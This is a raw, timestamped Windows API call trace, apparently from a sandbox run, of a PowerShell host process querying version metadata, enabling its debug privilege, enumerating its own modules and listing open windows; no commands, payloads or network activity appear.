	[0253.225] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0253.225] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0253.225] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0255.966] GetVersionExW (in: lpVersionInformation=0x1cdf20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdf20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.316] GetVersionExW (in: lpVersionInformation=0x1cdf20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdf20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.330] GetVersionExW (in: lpVersionInformation=0x1cdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdc90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0256.330] SetErrorMode (uMode=0x1) returned 0x1
	[0256.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cddf0 | out: lpFileInformation=0x1cddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0256.332] SetErrorMode (uMode=0x1) returned 0x1
	[0256.336] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce060 | out: lpdwHandle=0x1ce060) returned 0x94c
	[0256.345] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca72d8 | out: lpData=0x2ca72d8) returned 1
	[0256.348] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdfd8, puLen=0x1cdfd0 | out: lplpBuffer=0x1cdfd8*=0x2ca7374, puLen=0x1cdfd0) returned 1
	[0256.350] lstrlenW (lpString="䅁") returned 1
	[0256.359] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca7450, puLen=0x1cdf40) returned 1
	[0256.360] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0256.362] CoTaskMemAlloc (cb=0x2e) returned 0x2e24d0
	[0256.362] lstrcpyW (in: lpString1=0x2e24d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0256.363] CoTaskMemFree (pv=0x2e24d0) 
	[0256.363] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca74a4, puLen=0x1cdf40) returned 1
	[0256.363] lstrlenW (lpString="System.Management.Automation") returned 28
	[0256.363] CoTaskMemAlloc (cb=0x3c) returned 0x268ee0
	[0256.363] lstrcpyW (in: lpString1=0x268ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0256.363] CoTaskMemFree (pv=0x268ee0) 
	[0256.363] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca7500, puLen=0x1cdf40) returned 1
	[0256.363] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0256.363] CoTaskMemAlloc (cb=0x20) returned 0x2e0680
	[0256.363] lstrcpyW (in: lpString1=0x2e0680, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0256.363] CoTaskMemFree (pv=0x2e0680) 
	[0256.363] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca7540, puLen=0x1cdf40) returned 1
	[0256.364] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0256.364] CoTaskMemAlloc (cb=0x44) returned 0x268ee0
	[0256.364] lstrcpyW (in: lpString1=0x268ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0256.364] CoTaskMemFree (pv=0x268ee0) 
	[0256.364] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca75a8, puLen=0x1cdf40) returned 1
	[0256.364] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0256.364] CoTaskMemAlloc (cb=0x76) returned 0x28fec0
	[0256.364] lstrcpyW (in: lpString1=0x28fec0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0256.364] CoTaskMemFree (pv=0x28fec0) 
	[0256.364] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca7644, puLen=0x1cdf40) returned 1
	[0256.364] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0256.685] CoTaskMemAlloc (cb=0x44) returned 0x268ee0
	[0256.685] lstrcpyW (in: lpString1=0x268ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0256.686] CoTaskMemFree (pv=0x268ee0) 
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca76a8, puLen=0x1cdf40) returned 1
	[0256.686] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0256.686] CoTaskMemAlloc (cb=0x58) returned 0x2b52d0
	[0256.686] lstrcpyW (in: lpString1=0x2b52d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0256.686] CoTaskMemFree (pv=0x2b52d0) 
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca7724, puLen=0x1cdf40) returned 1
	[0256.686] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0256.686] CoTaskMemAlloc (cb=0x20) returned 0x2e0680
	[0256.686] lstrcpyW (in: lpString1=0x2e0680, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0256.686] CoTaskMemFree (pv=0x2e0680) 
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x2ca73cc, puLen=0x1cdf40) returned 1
	[0256.686] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0256.686] CoTaskMemAlloc (cb=0x66) returned 0x2def10
	[0256.686] lstrcpyW (in: lpString1=0x2def10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0256.686] CoTaskMemFree (pv=0x2def10) 
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x0, puLen=0x1cdf40) returned 0
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x0, puLen=0x1cdf40) returned 0
	[0256.686] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdf48, puLen=0x1cdf40 | out: lplpBuffer=0x1cdf48*=0x0, puLen=0x1cdf40) returned 0
	[0256.687] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2ca7374, puLen=0x1cdf10) returned 1
	[0256.688] CoTaskMemAlloc (cb=0x204) returned 0x292690
	[0256.688] VerLanguageNameW (in: wLang=0x0, szLang=0x292690, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0256.689] CoTaskMemFree (pv=0x292690) 
	[0256.689] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\", lplpBuffer=0x1cdf68, puLen=0x1cdf60 | out: lplpBuffer=0x1cdf68*=0x2ca7300, puLen=0x1cdf60) returned 1
	[0256.695] GetCurrentProcessId () returned 0x984
	[0256.710] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1cce90 | out: lpLuid=0x1cce90*(LowPart=0x14, HighPart=0)) returned 1
	[0256.713] GetCurrentProcess () returned 0xffffffffffffffff
	[0256.714] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1cceb0 | out: TokenHandle=0x1cceb0*=0x2e8) returned 1
	[0256.714] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2caab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0256.716] CloseHandle (hObject=0x2e8) returned 1
	[0256.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x2e8
	[0256.728] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2caabb8, cb=0x200, lpcbNeeded=0x1cdec8 | out: lphModule=0x2caabb8, lpcbNeeded=0x1cdec8) returned 1
	[0256.730] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2caae28, cb=0x18 | out: lpmodinfo=0x2caae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0256.731] CoTaskMemAlloc (cb=0x804) returned 0x2e93c0
	[0256.731] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x2e93c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0256.731] CoTaskMemFree (pv=0x2e93c0) 
	[0257.107] CoTaskMemAlloc (cb=0x804) returned 0x2e93c0
	[0257.107] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x2e93c0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0257.107] CoTaskMemFree (pv=0x2e93c0) 
	[0257.108] CloseHandle (hObject=0x2e8) returned 1
	[0257.120] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x984) returned 0x2e8
	[0257.121] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x1cdff8 | out: lpExitCode=0x1cdff8*=0x103) returned 1
	[0257.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cab088, Length=0x20000, ResultLength=0x1cdfc0 | out: SystemInformation=0x12cab088, ResultLength=0x1cdfc0*=0x10a10) returned 0x0
	[0257.146] EnumWindows (lpEnumFunc=0x1d766ac, lParam=0x0) returned 1
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x558
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x538
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x778
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x778
	[0257.148] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.149] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xa6c
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xa68
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x9f8
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xa04
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x924
	[0257.150] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x8dc
	[0257.151] GetWindow (hWnd=0x10200, uCmd=0x4) returned 0x0
	[0257.152] IsWindowVisible (hWnd=0x10200) returned 0
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7dc
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x768
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x764
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x820
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x810
	[0257.152] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x794
	[0257.153] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x83c
	[0257.153] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7ac
	[0257.153] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb44
	[0257.153] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb5c
	[0257.153] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x838
	[0257.684] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0258.628] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0260.118] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0260.118] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0260.441] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0261.335] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0261.959] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0261.960] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x818
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x5b8
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x494
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x1ec
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x440
	[0262.334] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7e8
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x730
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x2c8
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x31c
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x330
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x128
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x5c8
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x6f8
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x358
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x73c
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb0
	[0262.335] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x250
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x240
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x790
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x61c
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x540
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x538
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x568
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x538
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x568
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x538
	[0262.336] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x540
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x540
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x510
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x57c
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x554
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x528
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.337] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x79c
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4e0
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x44c
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x778
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x558
	[0262.338] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4d0
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7e0
